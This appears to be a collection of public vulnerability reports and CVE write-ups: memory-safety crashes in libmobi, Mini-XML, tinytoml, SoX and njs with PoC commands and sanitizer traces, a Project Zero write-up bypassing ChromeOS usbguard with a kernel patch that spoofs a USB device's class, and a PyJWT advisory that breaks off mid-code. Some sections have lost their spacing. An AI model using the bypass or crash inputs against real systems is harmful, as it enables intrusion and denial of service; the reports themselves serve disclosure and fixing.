Buffer Over-read in GitHub repository bfabiszewski/libmobi prior to 0.11.

**Description**

heap-buffer-overflow /home/ubuntu/libmobi-public/src/parse\_rawml.c:357 in mobi\_get\_attribute\_value

**Environment**

    Distributor ID: Ubuntu
    Description:    Ubuntu 20.04 LTS
    Release:    20.04
    Codename:   focal
    mobitool build: Apr 29 2022 20:52:30 (gcc 9.3.0)
    libmobi: 0.10
    

**Build**

    export CC=gcc CXX=g++ CFLAGS="-fsanitize=address -static-libasan" CXXFLAGS="-fsanitize=address -static-libasan" LDFLAGS="-fsanitize=address -static-libasan"
    autogen.sh &&  ./configure && make
    

**POC**

    ./mobitool -e -o ./tmp/ ./poc4
    

poc4

**ASAN**

    =================================================================
    ==150005==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x61b00000141f at pc 0x55dae390a641 bp 0x7ffefa5218a0 sp 0x7ffefa521890
    READ of size 1 at 0x61b00000141f thread T0
        #0 0x55dae390a640 in mobi_get_attribute_value /home/ubuntu/libmobi-public/src/parse_rawml.c:357
        #1 0x55dae391760d in mobi_get_filepos_array /home/ubuntu/libmobi-public/src/parse_rawml.c:1003
        #2 0x55dae391760d in mobi_reconstruct_links_kf7 /home/ubuntu/libmobi-public/src/parse_rawml.c:1660
        #3 0x55dae391b0d0 in mobi_reconstruct_links /home/ubuntu/libmobi-public/src/parse_rawml.c:1849
        #4 0x55dae391b0d0 in mobi_parse_rawml_opt /home/ubuntu/libmobi-public/src/parse_rawml.c:2153
        #5 0x55dae391b0d0 in mobi_parse_rawml /home/ubuntu/libmobi-public/src/parse_rawml.c:2009
        #6 0x55dae37bee00 in loadfilename /home/ubuntu/libmobi-public/tools/mobitool.c:852
        #7 0x55dae37bee00 in main /home/ubuntu/libmobi-public/tools/mobitool.c:1051
        #8 0x7feb6690f0b2 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x270b2)
        #9 0x55dae37ca6fd in _start (/home/ubuntu/libmobi-public/tools/mobitool+0x266fd)
    
    0x61b00000141f is located 0 bytes to the right of 1439-byte region [0x61b000000e80,0x61b00000141f)
    allocated by thread T0 here:
        #0 0x55dae38b5748 in malloc (/home/ubuntu/libmobi-public/tools/mobitool+0x111748)
        #1 0x55dae390ffc0 in mobi_reconstruct_parts /home/ubuntu/libmobi-public/src/parse_rawml.c:805
    
    SUMMARY: AddressSanitizer: heap-buffer-overflow /home/ubuntu/libmobi-public/src/parse_rawml.c:357 in mobi_get_attribute_value
    Shadow bytes around the buggy address:
      0x0c367fff8230: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x0c367fff8240: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x0c367fff8250: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x0c367fff8260: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x0c367fff8270: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    =>0x0c367fff8280: 00 00 00[07]fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c367fff8290: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c367fff82a0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c367fff82b0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c367fff82c0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c367fff82d0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
    Shadow byte legend (one shadow byte represents 8 application bytes):
      Addressable:           00
      Partially addressable: 01 02 03 04 05 06 07 
      Heap left redzone:       fa
      Freed heap region:       fd
      Stack left redzone:      f1
      Stack mid redzone:       f2
      Stack right redzone:     f3
      Stack after return:      f5
      Stack use after scope:   f8
      Global redzone:          f9
      Global init order:       f6
      Poisoned by user:        f7
      Container overflow:      fc
      Array cookie:            ac
      Intra object redzone:    bb
      ASan internal:           fe
      Left alloca redzone:     ca
      Right alloca redzone:    cb
      Shadow gap:              cc
    ==150005==ABORTING
    

**Impact**

The bug causes the program reads data past the end of the intented buffer. Typically, this can allow attackers to read sensitive information from other memory locations or cause a crash.

**Occurrences**

CVE-2022-1907: heap-buffer-overflow  in mobi_get_attribute_value in libmobi

ChromeOS uses usbguard when the screen is locked but appears to suffer from bypass issues.

    ChromeOS' usage of usbguard is bypassableVULNERABILITY DETAILSChromeOS uses https://usbguard.github.io/ when the screen is locked (but noton the login screen, perhaps because it is expected that code execution is muchless helpful when the disk is still encrypted?).When the screen is locked, a policy is applied that might look like this(example from my Pixelbook):```allow id 0bda:564b serial \"\\x07LOE65001063010A78M015CFAI06BF12000\" name \"WebCamera\" hash \"KsByWtMB5JtGNDimauArXMiZOThFwagdTWeQsMAZ48c=\" with-interface { 0e:01:00 0e:02:00 0e:02:00 0e:02:00 0e:02:00 0e:02:00 0e:02:00 0e:02:00 0e:02:00 } with-connect-type \"hardwired\"allow id 1d6b:0002 serial \"0000:00:14.0\" name \"xHCI Host Controller\" hash \"jEP/6WzviqdJ5VSeTUY8PatCNBKeaREvo2OqdplND/o=\" with-interface 09:00:00 with-connect-type \"\"allow id 1d6b:0003 serial \"0000:00:14.0\" name \"xHCI Host Controller\" hash \"3Wo3XWDgen1hD5xM3PSNl3P98kLp1RUTgGQ5HSxtf8k=\" with-interface 09:00:00 with-connect-type \"\"allow id 8087:0a2a serial \"\" name \"\" hash \"AyPZWy2XK0931kB9A/owYfk5xHEqnpDsJfdeLSGIyuk=\" with-interface { e0:01:01 e0:01:01 e0:01:01 e0:01:01 e0:01:01 e0:01:01 e0:01:01 } with-connect-type \"hardwired\"##################################################################################################### Footer.####################################################################################################block with-interface one-of { 05:*:* 06:*:* 07:*:* 08:*:* } # physical, image, printer, storageallow```As you can see, it mostly just allowlists specific devices with full hashes ofthe expected USB configuration descriptors, and internal USB devices are markedsuch that they won't be accepted on external USB ports.(Which, by the way, might not actually be necessary, since the USB subsystem's`authorized_default` flag is set to 2 when the screen is locked, not 0, meaninginternal USB devices are automatically allowed anyway?)But then at the bottom is this footer that blocks USB devices with interfacedescriptors that contain the following `bInterfaceClass` values: - USB_CLASS_PHYSICAL (5) - USB_CLASS_STILL_IMAGE (6) - USB_CLASS_PRINTER (7) - USB_CLASS_MASS_STORAGE (8)Afterwards, anything else is permitted.This configuration footer comes from<https://source.chromium.org/chromiumos/chromiumos/codesearch/+/main:src/third_party/chromiumos-overlay/sys-apps/usbguard/files/99-rules.conf>.The interface-based classification of devices was introduced in<https://chromium-review.googlesource.com/c/chromiumos/overlays/chromiumos-overlay/+/1217622/>.Apart from the problem that there is a large amount of attack surface in driversfor devices that don't belong into those USB interface classes, there is anotherissue with this approach:The kernel often doesn't care what USB class a device claims to be. The way USBdrivers tend to work, even for standardized protocols, is that the driverspecifies with low priority that it would like to bind to standards-compliantdevices using the proper USB interface class, but also specifies with highpriority that it would like to bind to specific USB devices based on Vendor IDand Product ID, without caring about their USB interface class.As an example, USB_CLASS_MASS_STORAGE is blocklisted, so a USB stick insertedwhile the screen is locked doesn't get past the authorization check:[ 6411.611320] usb 1-1: new high-speed USB device number 31 using xhci_hcd[ 6411.738900] usb 1-1: New USB device found, idVendor=0781, idProduct=5580, bcdDevice= 0.10[ 6411.738910] usb 1-1: New USB device strings: Mfr=1, Product=2, SerialNumber=3[ 6411.738916] usb 1-1: Product: [...][ 6411.738921] usb 1-1: Manufacturer: SanDisk[ 6411.738926] usb 1-1: SerialNumber: [...][ 6411.740583] usb 1-1: Device is not authorized for usage[ 6414.875133] cros-ec-sensorhub [...][ 6418.603609] usb 1-1: USB disconnect, device number 31But if we use a Linux machine with appropriate hardware (I'm using a NET2380 devboard, but you could probably also do it with an unlocked Pixel phone or aRaspberry Pi Zero W or something like that) to emulate a USB Mass Storagedevice, using <https://docs.kernel.org/usb/mass-storage.html>, and patch oneline in the attacker kernel so that it claims to be a billboard, not a storagedevice:diff --git a/drivers/usb/gadget/function/storage_common.c b/drivers/usb/gadget/function/storage_common.cindex b859a158a414..d7452c8458a9 100644--- a/drivers/usb/gadget/function/storage_common.c+++ b/drivers/usb/gadget/function/storage_common.c@@ -34,7 +34,7 @@ struct usb_interface_descriptor fsg_intf_desc = {   .bDescriptorType =  USB_DT_INTERFACE,    .bNumEndpoints =  2,    /* Adjusted during fsg_bind() */-  .bInterfaceClass =  USB_CLASS_MASS_STORAGE,+  .bInterfaceClass =  USB_CLASS_BILLBOARD,   .bInterfaceSubClass =  USB_SC_SCSI,  /* Adjusted during fsg_bind() */   .bInterfaceProtocol =  USB_PR_BULK,  /* Adjusted during fsg_bind() */   .iInterface =    FSG_STRING_INTERFACE,Then we can connect just fine even while the screen is locked - first we get a\"Device is not authorized\" message on the initial connection, then usbguardunblocks us and the kernel probes the device as a mass storage device and scansthe partition table:[ 6432.752906] usb 1-1: new high-speed USB device number 32 using xhci_hcd[ 6432.885635] usb 1-1: New USB device found, idVendor=0525, idProduct=a4a5, bcdDevice= 5.17[ 6432.885647] usb 1-1: New USB device strings: Mfr=3, Product=4, SerialNumber=0[ 6432.885653] usb 1-1: Product: Mass Storage Gadget[ 6432.885658] usb 1-1: Manufacturer: Linux 5.17.0-rc4+ with net2280[ 6432.886121] usb 1-1: Device is not authorized for usage[ 6432.891672] usb-storage 1-1:1.0: USB Mass Storage device detected[ 6432.891985] usb-storage 1-1:1.0: Quirks match for vid 0525 pid a4a5: 10000[ 6432.892090] scsi host0: usb-storage 1-1:1.0[ 6432.892567] usb 1-1: authorized to connect[ 6433.920354] scsi 0:0:0:0: Direct-Access     Linux    File-Stor Gadget 0517 PQ: 0 ANSI: 2[ 6433.922585] sd 0:0:0:0: Power-on or device reset occurred[ 6433.923533] sd 0:0:0:0: [sda] 204800 512-byte logical blocks: (105 MB/100 MiB)[ 6434.030869] sd 0:0:0:0: [sda] Write Protect is off[ 6434.030876] sd 0:0:0:0: [sda] Mode Sense: 0f 00 00 00[ 6434.136540] sd 0:0:0:0: [sda] Write cache: enabled, read cache: enabled, doesn't support DPO or FUA[ 6434.363462]  sda: sda1 sda2[ 6434.585367] cros-ec-sensorhub [...][ 6434.588541] sd 0:0:0:0: [sda] Attached SCSI diskI haven't looked at how this issue applies to other USB subsystems in detail,but from a quick glance: - USB_CLASS_PHYSICAL doesn't really show up in the Linux kernel outside of some   number-to-string translation table, so I don't think it matters to the kernel. - Same thing with USB_CLASS_STILL_IMAGE. - The usblp subsystem does have an explicit check for USB_CLASS_PRINTER - but   that check is intentionally bypassed for known devices that are marked in   the kernel as USBLP_QUIRK_BAD_CLASS, and that flag is set for the   \"Seiko Epson Receipt Printer M129C\" (vendor 0x04b8, device 0x0202), so you   can probably also bypass the blocking of the printer interface class that way.I think the best way forward would be to look into whether it is feasible torely exclusively on a trust-on-first-use approach. If that is infeasible, youmay have to talk to upstream about how userspace can reliably determine whichdriver(s) a given USB device might be bound to, since I'm not aware of anyinterface that would let you do that.VERSIONGoogle Chrome  98.0.4758.107 (Official Build) (64-bit) Revision  a2ef32d533baed737df9fc2ed8d505405ecf0c66-refs/branch-heads/4758@{#1167}Platform  14388.61.0 (Official Build) stable-channel eveFirmware Version  Google_Eve.9584.230.0Customization ID  GOOGLE-EVEARC  8165997CREDIT INFORMATIONReporter credit: Jann Horn of Google Project ZeroThis bug is subject to a 90-day disclosure deadline. If a fix for thisissue is made available to users before the end of the 90-day deadline,this bug report will become public 30 days after the fix was madeavailable. Otherwise, this bug report will become public at the deadline.The scheduled deadline is 2022-05-25.Found by: jannh@google.com

ChromeOS usbguard Bypass

A stack buffer overflow exists in Mini-XML v3.2. When inputting an unformed XML string to the mxmlLoadString API, it will cause a stack-buffer-overflow in mxml_string_getc:2611.

Hi,

We have used Mini-xml in our project, so I test v3.2 and master branch and found something:

Fisrt, there are some memory leaks in v3.2 and master:

    =================================================================
    ==111401==ERROR: LeakSanitizer: detected memory leaks
    
    Direct leak of 6 byte(s) in 1 object(s) allocated from:
        #0 in strdup (/opt/mnt/software/mxml32/a.out+0x46f260)
        #1 in mxmlSaveAllocString /opt/mnt/software/mxml32/mxml-file.c:227:13
        #2 in LLVMFuzzerTestOneInput /opt/mnt/software/mxml32/mxml_fuzzer.cpp:23:8
        #3 in fuzzer::Fuzzer::ExecuteCallback(unsigned char const*, unsigned long) (/opt/mnt/software/mxml32/a     .out+0x42f357)
        #4 in fuzzer::Fuzzer::MutateAndTestOne() (/opt/mnt/software/mxml32/a.out+0x439bc4)
        #5 in fuzzer::Fuzzer::Loop(std::vector<std::__cxx11::basic_string<char, std::char_traits<char>, std::a     llocator<char> >, fuzzer::fuzzer_allocator<std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<     char> > > > const&) (/opt/mnt/software/mxml32/a.out+0x43b22f)
        #6 in fuzzer::FuzzerDriver(int*, char***, int (*)(unsigned char const*, unsigned long)) (/opt/mnt/soft     ware/mxml32/a.out+0x42a5ec)
        #7 in main (/opt/mnt/software/mxml32/a.out+0x41d4b2)
        #8 in __libc_start_main /build/glibc-S9d2JN/glibc-2.27/csu/../csu/libc-start.c:310
    
    SUMMARY: AddressSanitizer: 6 byte(s) leaked in 1 allocation(s).
    INFO: to ignore leaks on libFuzzer side use -detect_leaks=0.
    

and :  
this is your testmxml.c:

    ...
    Creating libmxml.so.1.6...
    Creating libmxml.a...
    a - mxml-attr.o
    a - mxml-entity.o
    a - mxml-file.o
    a - mxml-get.o
    a - mxml-index.o
    a - mxml-node.o
    a - mxml-search.o
    a - mxml-set.o
    a - mxml-private.o
    a - mxml-string.o
    Compiling testmxml.c
    Linking testmxml...
    Testing library...
    
    =================================================================
    ==113129==ERROR: LeakSanitizer: detected memory leaks
    
    Direct leak of 88 byte(s) in 1 object(s) allocated from:
        #0 in calloc (/opt/mnt/software/mxml32/testmxml+0x4da178)
        #1 in mxml_new /opt/mnt/software/mxml32/mxml-node.c:841:15
        #2 in mxmlNewElement /opt/mnt/software/mxml32/mxml-node.c:382:15
        #3 in mxml_load_data /opt/mnt/software/mxml32/mxml-file.c:1783:14
        #4 in mxmlSAXLoadFile /opt/mnt/software/mxml32/mxml-file.c:467:11
        #5 in main /opt/mnt/software/mxml32/testmxml.c:676:5
        #6 in __libc_start_main /build/glibc-S9d2JN/glibc-2.27/csu/../csu/libc-start.c:310
    
    Indirect leak of 37 byte(s) in 1 object(s) allocated from:
        #0 in __interceptor_strdup (/opt/mnt/software/mxml32/testmxml+0x436770)
        #1 in mxmlNewElement /opt/mnt/software/mxml32/mxml-node.c:383:32
        #2 in mxml_load_data /opt/mnt/software/mxml32/mxml-file.c:1783:14
        #3 in mxmlSAXLoadFile /opt/mnt/software/mxml32/mxml-file.c:467:11
        #4 in main /opt/mnt/software/mxml32/testmxml.c:676:5
        #5 in __libc_start_main /build/glibc-S9d2JN/glibc-2.27/csu/../csu/libc-start.c:310
    
    SUMMARY: AddressSanitizer: 125 byte(s) leaked in 2 allocation(s).
    Makefile:271: recipe for target 'testmxml' failed
    make: *** [testmxml] Error 1
    

also ,we I input an unformed string to mxmlLoadString, there will be a stack-buffer-overflow and heap-buffer-overflow. I think if you add a longth check in mxml\_string\_getc when every pointer change("like (\*s)++"), will be better? Of course Maybe I have use it in a wrong . you can check it here:  
this is my testcase:

    #include <string>
    #include <vector>
    #include <assert.h>
    #include "mxml.h"
    
    extern "C" int LLVMFuzzerTestOneInput(const uint8_t *data, size_t size) {
    
    std::string c(reinterpret_cast<const char *>(data), size);
    
    char *ptr;
    
    mxml_node_t *tree;
    
    tree = mxmlLoadString(NULL, c.c_str(), MXML_NO_CALLBACK);
    
    if(tree){
            ptr = mxmlSaveAllocString(tree, MXML_NO_CALLBACK);
            if(!ptr) assert(false);
            mxmlDelete(tree);
    }
    
    return 0;
    }
    
    

you can compile your lib with  
CFLAGS =+ "-g -O0 -fno-omit-frame-pointer -gline-tables-only -fsanitize=address -fsanitize-address-use-after-scope -fsanitize=fuzzer-no-link" and  
LDFLAGS =+"-fsanitize=fuzzer-no-link -fsanitize=address"  
and  
clang++ -g -O1 -fno-omit-frame-pointer -gline-tables-only -fsanitize=address -fsanitize-address-use-after-scope -fsanitize=fuzzer-no-link mxml\_fuzzer.cpp -I ./ -fsanitize=fuzzer ./libmxml.a

run and these are the backtrace:

    =================================================================
    ==2858==ERROR: AddressSanitizer: stack-buffer-overflow on address 0x7ffed9190220 at pc 0x00000055a6f2 bp 0x7ffed918edc0 sp 0x7ffed918edb8
    READ of size 1 at 0x7ffed9190220 thread T0
        #0 in mxml_string_getc /opt/mnt/software/mxml32/mxml-file.c:2611:16
        #1 in mxml_parse_element /opt/mnt/software/mxml32/mxml-file.c:2141:16
        #2 in mxml_load_data /opt/mnt/software/mxml32/mxml-file.c:1977:14
        #3 in mxmlLoadString /opt/mnt/software/mxml32/mxml-file.c:180:11
        #4 in LLVMFuzzerTestOneInput /opt/mnt/software/mxml32/mxml_fuzzer.cpp:12:8
        #5 in fuzzer::Fuzzer::ExecuteCallback(unsigned char const*, unsigned long) (/opt/mnt/software/mxml32/a.out+0x42f357)
        #6 in fuzzer::RunOneTest(fuzzer::Fuzzer*, char const*, unsigned long) (/opt/mnt/software/mxml32/a.out+0x41f7ea)
        #7 in fuzzer::FuzzerDriver(int*, char***, int (*)(unsigned char const*, unsigned long)) (/opt/mnt/software/mxml32/a.out+0x42a7b0)
        #8 in main (/opt/mnt/software/mxml32/a.out+0x41d4b2)
        #9 in __libc_start_main /build/glibc-S9d2JN/glibc-2.27/csu/../csu/libc-start.c:310
        #10 in _start (/opt/mnt/software/mxml32/a.out+0x41d529)
    

    =================================================================
    ==6265==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x612000000a73 at pc 0x000000558e2d bp 0x7ffe13e2caa0 sp 0x7ffe13e2ca98
    READ of size 1 at 0x612000000a73 thread T0
        #0 in mxml_string_getc /opt/mnt/software/mxml32/mxml-file.c:2422:13
        #1 in mxml_load_data /opt/mnt/software/mxml32/mxml-file.c:1558:20
        #2 in mxmlLoadString /opt/mnt/software/mxml32/mxml-file.c:180:11
        #3 in LLVMFuzzerTestOneInput /opt/mnt/software/mxml32/mxml_fuzzer.cpp:12:8
        #4 in fuzzer::Fuzzer::ExecuteCallback(unsigned char const*, unsigned long) (/opt/mnt/software/mxml32/a.out+0x42f357)
        #5 in fuzzer::RunOneTest(fuzzer::Fuzzer*, char const*, unsigned long) (/opt/mnt/software/mxml32/a.out+0x41f7ea)
        #6 in fuzzer::FuzzerDriver(int*, char***, int (*)(unsigned char const*, unsigned long)) (/opt/mnt/software/mxml32/a.out+0x42a7b0)
        #7 in main (/opt/mnt/software/mxml32/a.out+0x41d4b2)
        #8 in __libc_start_main /build/glibc-S9d2JN/glibc-2.27/csu/../csu/libc-start.c:310
        #9 in _start (/opt/mnt/software/mxml32/a.out+0x41d529)

CVE-2021-42860: stack-buffer-overflow and heap-buffer-overflow · Issue #286 · michaelrsweet/mxml

There is a stack-overflow vulnerability in tinytoml v0.4 that can cause a crash or DoS.

Hi,

I have found a bug when I fuzzing . When I enter an input file to a program use toml.h with parseFile, it cause a stack-overflow at parseFile function. I think there maybe too much loop or other bug cause this . my stack size is 8192kbs.

I know that we can avoid it by ulimit -s , but I think parse a toml file about 32k that cause 8M stack overflow maybe not a good way. If I make a file follow some pattern , the file may be minimized and smaller than 10k.

Here is the backtrace：

    #0 __asan_memset ()
        at /src/llvm-project/compiler-rt/lib/asan/asan_interceptors_memintrinsics.cpp:26
    #1  std::__1::basic_string<char, std::__1::char_traits<char>, std::__1::allocator<char> >::__zero() () at /usr/local/bin/../include/c++/v1/string:1563
    #2  std::__1::basic_string<char, std::__1::char_traits<char>, std::__1::allocator<char> >::basic_string() () at /usr/local/bin/../include/c++/v1/string:1812
    #3  toml::internal::Token::Token(toml::internal::TokenType) () at ./include/toml/toml.h:272
    #4  toml::internal::Lexer::nextToken(bool) () at ./include/toml/toml.h:1022
    #5  toml::internal::Lexer::nextValueToken() () at ./include/toml/toml.h:967
    #6  toml::internal::Parser::nextValue() () at ./include/toml/toml.h:347
    #7  toml::internal::Parser::consumeForValue(toml::internal::TokenType) ()
        at ./include/toml/toml.h:1740
    

(and maybe 20000 times repeat below two lines)

    toml::internal::Parser::parseArray(toml::Value*) () at ./include/toml/toml.h:1978
    toml::internal::Parser::parseValue(toml::Value*) () at ./include/toml/toml.h:1919
    

and this below:

    toml::internal::Parser::parseKeyValue(toml::Value*) () at ./include/toml/toml.h:1883
    toml::internal::Parser::parse() () at ./include/toml/toml.h:1790
    toml::parse(std::__1::basic_istream<char, std::__1::char_traits<char> >&) ()
        at ./include/toml/toml.h:385
    toml::parseFile(std::__1::basic_string<char, std::__1::char_traits<char>, std::__1::allocator<char> > const&) () at ./include/toml/toml.h:401
    LLVMFuzzerTestOneInput () at /src/parse_file.cc:16
    fuzzer::Fuzzer::ExecuteCallback(unsigned char const*, unsigned long) ()
    RunOneTest () at /src/llvm-project/compiler-rt/lib/fuzzer/FuzzerDriver.cpp:323
    fuzzer::FuzzerDriver(int*, char***, int (*)(unsigned char const*, unsigned long)) ()
    main () at /src/llvm-project/compiler-rt/lib/fuzzer/FuzzerMain.cpp:20
    

the testcase I use is like parse\_file.cc in your project. you can just compile use your code and input my file to the parse\_file. stack size is 8192kbs. And you will get a segment fault caused by stack overflow. I have upload the file causes this.  
crashcase.zip

CVE-2021-42692: stack-overflow at  "parseFile"  · Issue #49 · mayah/tinytoml

In SoX 14.4.2, there is an assertion failure in rate_init in rate.c in libsox.a.

**summary**

Hello, I was testing my new fuzzer and found two bugs: a reachable assertion in rate\_init, rate.c:303 and a float point exception in lsx\_aiffstartwrite.

**environment**

sox latest commit 42b3557e13e0fe01a83465b672d89faddbe65f49,  
clang 12.0.1,  
Ubuntu 21.10

**step to reproduce**

compile sox with CC=clang, CFLAGS="-fsanitize=address -g"  
run command ./sox --single-threaded @@ -t aiff /dev/null

**BUG1**

sox:rate.c:303:voidrate_init(rate_t*,rate_shared_t*,double,double,double,double,double,rolloff_t,sox_bool,sox_bool,int,int,sox_bool):Assertion`factor>0'failed.
Aborted

**BUG2**

AddressSanitizer:DEADLYSIGNAL
=================================================================
==3050061==ERROR:AddressSanitizer:FPEonunknownaddress0x000000591211(pc0x000000591211bp0x7ffd7929b6b0sp0x7ffd7929b660T0)
#00x591211inlsx_aiffstartwrite(/home/kdsj/workspace/fuzz/sox-aiff/sox+0x591211)
#10x83e26finopen_write(/home/kdsj/workspace/fuzz/sox-aiff/sox+0x83e26f)
#20x83b303insox_open_write(/home/kdsj/workspace/fuzz/sox-aiff/sox+0x83b303)
#30x8a4ae8inopen_output_file(/home/kdsj/workspace/fuzz/sox-aiff/sox+0x8a4ae8)
#40x8952e1inprocess(/home/kdsj/workspace/fuzz/sox-aiff/sox+0x8952e1)
#50x887e23inmain(/home/kdsj/workspace/fuzz/sox-aiff/sox+0x887e23)
#60x7fac08e4afcfin__libc_start_call_main../sysdeps/nptl/libc_start_call_main.h:58
#70x7fac08e4b07cin__libc_start_main_impl../csu/libc-start.c:409
#80x408864in_start(/home/kdsj/workspace/fuzz/sox-aiff/sox+0x408864)

AddressSanitizercannotprovideadditionalinfo.
SUMMARY:AddressSanitizer:FPE(/home/kdsj/workspace/fuzz/sox-aiff/sox+0x591211)inlsx_aiffstartwrite
==3050061==ABORTING

**POC**

as shown in attachment poc.zip

**Credit**

NCNIPC of China  
Hexhive

CVE-2022-31651: SoX - Sound eXchange / Bugs

Nginx NJS v0.7.3 was discovered to contain a stack overflow in the function njs_default_module_loader at /src/njs/src/njs_module.c.

**Description**

njs 0.7.3, used in NGINX, was discovered to contain a stack-buffer-overflow in njs\_default\_module\_loader  
(/src/njs/src/njs\_module.c)

**ENV**

*   Version : 0.7.3
*   Commit : 222d6fd
*   OS : Ubuntu 18.04
*   Configure : CC=clang-14 ./configure --address-sanitizer=YES

**BT**

    root@826e0eaa5e54:/src/njs_0.7.3_debug# ./build/njs /njs/out/crash_stack-buffer-overflow_1 
    =================================================================
    ==22820==ERROR: AddressSanitizer: stack-buffer-overflow on address 0x7ffe0b253e41 at pc 0x00000049e4ca bp 0x7ffe0b252e10 sp 0x7ffe0b2525d8
    WRITE of size 21313 at 0x7ffe0b253e41 thread T0
        #0 0x49e4c9 in __asan_memcpy /src/llvm-project/compiler-rt/lib/asan/asan_interceptors_memintrinsics.cpp:22:3
        #1 0x55db4a in njs_module_path /src/njs_0.7.3_debug/src/njs_module.c:148:18
        #2 0x55db4a in njs_module_lookup /src/njs_0.7.3_debug/src/njs_module.c:83:11
        #3 0x55db4a in njs_default_module_loader /src/njs_0.7.3_debug/src/njs_module.c:377:11
        #4 0x55d195 in njs_parser_module /src/njs_0.7.3_debug/src/njs_module.c:56:14
        #5 0x59a737 in njs_parser_import /src/njs_0.7.3_debug/src/njs_parser.c:7793:24
        #6 0x56ed11 in njs_parser /src/njs_0.7.3_debug/src/njs_parser.c:598:23
        #7 0x4e92cd in njs_vm_compile /src/njs_0.7.3_debug/src/njs_vm.c:159:11
        #8 0x4d7c66 in njs_process_script /src/njs_0.7.3_debug/src/njs_shell.c:886:11
        #9 0x4d72bb in njs_process_file /src/njs_0.7.3_debug/src/njs_shell.c:619:11
        #10 0x4d72bb in main /src/njs_0.7.3_debug/src/njs_shell.c:303:15
        #11 0x7f566fabf0b2 in __libc_start_main /build/glibc-sMfBJT/glibc-2.31/csu/../csu/libc-start.c:308:16
        #12 0x41ea3d in _start (/src/njs_0.7.3_debug/build/njs+0x41ea3d)
    
    Address 0x7ffe0b253e41 is located in stack of thread T0 at offset 4129 in frame
        #0 0x55d6af in njs_default_module_loader /src/njs_0.7.3_debug/src/njs_module.c:363
    
      This frame has 6 object(s):
        [32, 4129) 'src.i' (line 115)
        [4400, 4544) 'sb.i' (line 173) <== Memory access at offset 4129 partially underflows this variable
        [4608, 8705) 'src.i.i' (line 115) <== Memory access at offset 4129 partially underflows this variable
        [8976, 8992) 'cwd' (line 365) <== Memory access at offset 4129 partially underflows this variable
        [9008, 9024) 'text' (line 365) <== Memory access at offset 4129 partially underflows this variable
        [9040, 13184) 'info' (line 368) <== Memory access at offset 4129 partially underflows this variable
    HINT: this may be a false positive if your program uses some custom stack unwind mechanism, swapcontext or vfork
          (longjmp and C++ exceptions *are* supported)
    SUMMARY: AddressSanitizer: stack-buffer-overflow /src/llvm-project/compiler-rt/lib/asan/asan_interceptors_memintrinsics.cpp:22:3 in __asan_memcpy
    Shadow bytes around the buggy address:
      0x100041642770: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x100041642780: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x100041642790: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x1000416427a0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x1000416427b0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    =>0x1000416427c0: 00 00 00 00 00 00 00 00[01]f2 f2 f2 f2 f2 f2 f2
      0x1000416427d0: f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2
      0x1000416427e0: f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f8 f8 f8 f8 f8 f8
      0x1000416427f0: f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f2 f2 f2 f2
      0x100041642800: f2 f2 f2 f2 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8
      0x100041642810: f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8
    Shadow byte legend (one shadow byte represents 8 application bytes):
      Addressable:           00
      Partially addressable: 01 02 03 04 05 06 07 
      Heap left redzone:       fa
      Freed heap region:       fd
      Stack left redzone:      f1
      Stack mid redzone:       f2
      Stack right redzone:     f3
      Stack after return:      f5
      Stack use after scope:   f8
      Global redzone:          f9
      Global init order:       f6
      Poisoned by user:        f7
      Container overflow:      fc
      Array cookie:            ac
      Intra object redzone:    bb
      ASan internal:           fe
      Left alloca redzone:     ca
      Right alloca redzone:    cb
    ==22820==ABORTING
    
    

**Fixed**

The issue was fixed in ab1702c.

FYI, the problem was committed in 2ff8b26 which was not released yet.

**Reference**

https://huntr.dev/bounties/a244d6e7-a5ec-47ef-9d77-8c50764ffc0a/

CVE-2022-29379: [Fixed] njs 0.7.3 was discovered to contain a stack-buffer-overflow bug in njs_default_module_loader · Issue #493 · nginx/njs

### Impact
_What kind of vulnerability is it? Who is impacted?_

Disclosed by Aapo Oksman (Senior Security Specialist, Nixu Corporation).

> PyJWT supports multiple different JWT signing algorithms. With JWT, an 
> attacker submitting the JWT token can choose the used signing algorithm.
> 
> The PyJWT library requires that the application chooses what algorithms 
> are supported. The application can specify 
> "jwt.algorithms.get_default_algorithms()" to get support for all 
> algorithms. They can also specify a single one of them (which is the 
> usual use case if calling jwt.decode directly. However, if calling 
> jwt.decode in a helper function, all algorithms might be enabled.)
> 
> For example, if the user chooses "none" algorithm and the JWT checker 
> supports that, there will be no signature checking. This is a common 
> security issue with some JWT implementations.
> 
> PyJWT combats this by requiring that the if the "none" algorithm is 
> used, the key has to be empty. As the key is given by the application 
> running the checker, attacker cannot force "none" cipher to be used.
> 
> Similarly with HMAC (symmetric) algorithm, PyJWT checks that the key is 
> not a public key meant for asymmetric algorithm i.e. HMAC cannot be used 
> if the key begins with "ssh-rsa". If HMAC is used with a public key, the 
> attacker can just use the publicly known public key to sign the token 
> and the checker would use the same key to verify.
> 
>  From PyJWT 2.0.0 onwards, PyJWT supports ed25519 asymmetric algorithm. 
> With ed25519, PyJWT supports public keys that start with "ssh-", for 
> example "ssh-ed25519".

```python
import jwt
from cryptography.hazmat.primitives import serialization
